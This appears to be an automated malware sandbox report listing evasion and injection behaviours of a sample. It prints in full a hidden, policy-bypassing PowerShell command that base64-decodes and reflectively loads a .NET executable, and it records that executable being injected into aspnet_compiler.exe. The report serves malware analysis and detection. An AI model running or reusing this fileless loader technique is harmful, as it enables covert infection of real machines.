        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: Yara matchFile source: 0000000F.00000002.1735219264.000001FA636A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2420233433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2427144968.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2424988500.00000000014F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 3200000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 33C0000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 53C0000 memory reserve | memory write watch
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9295
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 599
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 9862
        Source: C:\Windows\System32\svchost.exe TID: 6372Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964Thread sleep count: 9295 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964Thread sleep count: 599 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 2212Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 2464Thread sleep count: 9862 > 30
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 412000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 414000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 11DA008
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -executionpolicy bypass -noprofile -windowstyle hidden -noexit -command [system.reflection.assembly]::load([system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaaziycapzxmuwaaaaaaaaaapaaigalajaaadgaaaacaaaaaaaaaaaaaaagaaaaaabaaqaaaaagaaaaagaabaaaaaaaaaagaaaaaaaaaacaaaaaagaaxdobaaiayiuaaeaaaaaaaabaaaaaaaaaaaaqaaaaaaaaiaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaabgaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaffyaabwaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaabiaaaaaaaaaaaaaaaudgv4daaaafa3aaaaiaaaadgaaaacaaaaaaaaaaaaaaaaaaagaabglnjzcmmaaaaqaaaaagaaaaacaaaaogaaaaaaaaaaaaaaaaaaqaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabiaaaaagafamqpaacykwaaaqaaabaaaazcvqaauaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaeaigxaaakkq5+aqaabc0ecgeaahdqagaaaigyaaakbxkaaapzggaacoabaaaefgeaaaqqgn4caaaekh4cgaiaaaqqgn4daaaekh4ckbsaaaoqvnmgaaagkbwaaap0awaaaoadaaaekjiohqaacgjvhgaaciqodwaocqaabg8bkaoaaabqaqaagygyaaakkb8aaaqlaqaagyoaaaabmasa5aiaaaeaabewcjjvagaafgssav4veqaaahid/huqaaaceglqeqaaaigyaaakkcaaaaooiqaacn0iaaaefg0aaaqcfiiaaap+iwaacn4jaaakfiaeaaaifimaaaouegisa28+aaaglqzzjaaacnodhzwojqaachmeaxeehzrykcuaaaotbsczaaaajtmaaaetbhegfiacaaeanigmaaakgjmafggaaaqjex8aaaqrbm8qaaaglsbzjaaacnp+bwaabal7hwaabbegbyyaaaytbnmkaaakeheghymuewcwewh+cwaabal7hgaabbehhlgscbosaw82aaaglqzzjaaacnorbreimxp+daaabal7hgaabbeibzoaaaysbnmkaaakegmrbb9qwcglaaakewkdeqqfvfgojqaachmkfhmlfgkaaaqjex4aaaqrbrejiaawaaafqg8uaaagewwrdc0gcyqaaap6fgoaaaqjex4aaaqrdamrchibbziaaaytbnmkaaakeheeipgaaabyew0deqqcwcgnaaakew4wexerdqmrdr8mwcglaaakexideq0fefgojqaachmtaxenhxrykcuaaaotfbetld0re400aaabexuderqrfryrfy5pkcgaaap+cgaabal7hgaabbemerjyerurfy5pegfvmgaabi0gcyqaaap6eq0fkfgtdrerf1gterereq4yhremkckaaaotd34kaaaecxseaaaeeqcewbepghibbziaaaytbnmkaaakegmrbb8owcglaaakexarcyweequtdbeghywrdbeqwj4ojgaachozgn4gaaaecxsfaaaeeqzvigaabi0gcyqaaap6fguaaaqjex8aaaqrbm8eaaaglqzzjaaacnp+baaabal7hwaabg8aaaagftmgcyqaaap6bcwlcxseaaaekbyaaabeiyyjeyaaaaqokgaacigraaakbywaaareaayxwaoggz8k/f//kkecaaaaaaaanaaaaiwcaadaagaagaaaabyaaaetmacawaaaaaiaabegaawaacgtaaakgo0waaabjrzzlgaacqilf34oaaaeoiuyf4wzaaaboiuzf40waaabjrycoqik0dsaaaeogaaacn4paaaekc8aaaowjdmaaaegbzaaaaoqezagaegaaaadaaaram8xaaakf2onnaaaaqowcyspbgccbxdibziaaaoodwaabhpiagcxyhdybziaaaoodwaabljsnacxwasham8xaaakf2myzayqogilhzoybb83kwifmfkqabmwawcbaaaabaaaesbxrqaakdmaaap+pwaabc0lhxdqlwaaasgyaaak0aqaaaiogaaacig0aaakkduaaaqapwaabh4/aaaeezyaaap+pwaabhi3aabwka0aaazvnwaacigoaaagciavnaaakdmaaaoooaaacn4qaaaebx4aaaogfigmaaagfig5aaakkgaaabmwawawaaaabaaaeqnvogaachfaf9yx2hfwjtqaaaekawywbzsaaaocggyoegaabhb+aswgczwaaap6kiyca4ebaaabayoaabmwbqbeaaaabqaaerannaaaaqowcwiabhysasgraaagjgcwnwohbid/fwaaajegczwaaap6ahosaaduf2rbhbfwf9ox1o00aaabkaeaacshegeoeqaabhb+aswgczwaaap6bhzzpqaacioaabmwcaawaaaabgaaeqiofqaabgogbz4aaaowfhcg/w8pabcucz8aaaowf
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -executionpolicy bypass -noprofile -windowstyle hidden -noexit -command [system.reflection.assembly]::load([system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaaziycapzxmuwaaaaaaaaaapaaigalajaaadgaaaacaaaaaaaaaaaaaaagaaaaaabaaqaaaaagaaaaagaabaaaaaaaaaagaaaaaaaaaacaaaaaagaaxdobaaiayiuaaeaaaaaaaabaaaaaaaaaaaaqaaaaaaaaiaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaabgaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaffyaabwaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaabiaaaaaaaaaaaaaaaudgv4daaaafa3aaaaiaaaadgaaaacaaaaaaaaaaaaaaaaaaagaabglnjzcmmaaaaqaaaaagaaaaacaaaaogaaaaaaaaaaaaaaaaaaqaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabiaaaaagafamqpaacykwaaaqaaabaaaazcvqaauaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaeaigxaaakkq5+aqaabc0ecgeaahdqagaaaigyaaakbxkaaapzggaacoabaaaefgeaaaqqgn4caaaekh4cgaiaaaqqgn4daaaekh4ckbsaaaoqvnmgaaagkbwaaap0awaaaoadaaaekjiohqaacgjvhgaaciqodwaocqaabg8bkaoaaabqaqaagygyaaakkb8aaaqlaqaagyoaaaabmasa5aiaaaeaabewcjjvagaafgssav4veqaaahid/huqaaaceglqeqaaaigyaaakkcaaaaooiqaacn0iaaaefg0aaaqcfiiaaap+iwaacn4jaaakfiaeaaaifimaaaouegisa28+aaaglqzzjaaacnodhzwojqaachmeaxeehzrykcuaaaotbsczaaaajtmaaaetbhegfiacaaeanigmaaakgjmafggaaaqjex8aaaqrbm8qaaaglsbzjaaacnp+bwaabal7hwaabbegbyyaaaytbnmkaaakeheghymuewcwewh+cwaabal7hgaabbehhlgscbosaw82aaaglqzzjaaacnorbreimxp+daaabal7hgaabbeibzoaaaysbnmkaaakegmrbb9qwcglaaakewkdeqqfvfgojqaachmkfhmlfgkaaaqjex4aaaqrbrejiaawaaafqg8uaaagewwrdc0gcyqaaap6fgoaaaqjex4aaaqrdamrchibbziaaaytbnmkaaakeheeipgaaabyew0deqqcwcgnaaakew4wexerdqmrdr8mwcglaaakexideq0fefgojqaachmtaxenhxrykcuaaaotfbetld0re400aaabexuderqrfryrfy5pkcgaaap+cgaabal7hgaabbemerjyerurfy5pegfvmgaabi0gcyqaaap6eq0fkfgtdrerf1gterereq4yhremkckaaaotd34kaaaecxseaaaeeqcewbepghibbziaaaytbnmkaaakegmrbb8owcglaaakexarcyweequtdbeghywrdbeqwj4ojgaachozgn4gaaaecxsfaaaeeqzvigaabi0gcyqaaap6fguaaaqjex8aaaqrbm8eaaaglqzzjaaacnp+baaabal7hwaabg8aaaagftmgcyqaaap6bcwlcxseaaaekbyaaabeiyyjeyaaaaqokgaacigraaakbywaaareaayxwaoggz8k/f//kkecaaaaaaaanaaaaiwcaadaagaagaaaabyaaaetmacawaaaaaiaabegaawaacgtaaakgo0waaabjrzzlgaacqilf34oaaaeoiuyf4wzaaaboiuzf40waaabjrycoqik0dsaaaeogaaacn4paaaekc8aaaowjdma